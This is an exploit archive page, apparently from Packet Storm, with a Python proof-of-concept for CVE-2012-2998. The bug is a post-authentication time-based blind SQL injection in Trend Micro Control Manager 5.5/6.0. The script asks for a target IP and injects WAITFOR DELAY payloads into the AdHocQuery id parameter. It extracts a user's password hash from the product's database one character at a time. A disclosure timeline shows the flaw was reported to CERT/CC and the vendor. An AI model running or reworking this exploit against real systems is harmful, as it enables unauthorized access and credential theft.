exploit the possibilities

Trend Micro Control Manager 5.5 / 6.0 Blind SQL Injection

Trend Micro Control Manager 5.5 / 6.0 Blind SQL Injection
Posted Sep 27, 2012
Authored by modpr0be, otoy

Trend Micro Control Manager versions 5.5 and 6.0 suffer from an AdHocQuery remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2012-2998
MD5 | 56f0a5421206e687e52f760ad196651e

Trend Micro Control Manager 5.5 / 6.0 Blind SQL Injection

Change Mirror Download
#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and
# policy violations, and automates routine tasks. New features include a customizable dashboard
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# Vulnerability found in AdHocQuery module inside the id parameter. By injecting payload after the
# id parameter, let say ' WAITFOR DELAY '0:0:5'-- the web application hung for 5 seconds,
# which gives us a conclusion that the web application is vulnerable to time-based sql injection.

# The script below is just a proof of concept, you must get a cookie. This vulnerability will need some
# attack vectors to be exploited, but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys,time,urllib,urllib2

print """
#===============================================================#
| |
| ___| | |
| \___ \ __ \ _ \ __ \ __| _ \ __| _` | |
| | | | __/ | | | __/ | ( | |
| _____/ .__/ \___|_| _|\__|\___|_| \__,_| |
| _| |
| |
| Trend Micro Control Manager BlindSQLi Password Extractor |
| CVE-2012-2998 |
| by otoy & modpr0be (research[at]spentera.com) |
| |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)
delay=2

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
return ord(hex(item).replace('0x',''))

def konek(m,n):
#borrow from SQLmap :)
query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
" WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

values = { 'Action': 'View',
'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
'asc': 'true',
'Sort': 7,
'paging': 10 }

url = "%s?%s" % (target, urllib.urlencode(values))
req = urllib2.Request(url)
req.add_header('Cookie', cookie)
try:
starttime=time.time()
response = urllib2.urlopen(req)
endtime = time.time()
return int(endtime-starttime)
except:
print '\n[-] Uh oh! Exploit fail..'
sys.exit(0)

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,33):
for n in range(0,16):
wkttunggu = konek(m,Hex2Des(n))
if (wkttunggu < delay):
sys.stdout.write(chr(Hex2Des(n)))
sys.stdout.flush()
break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close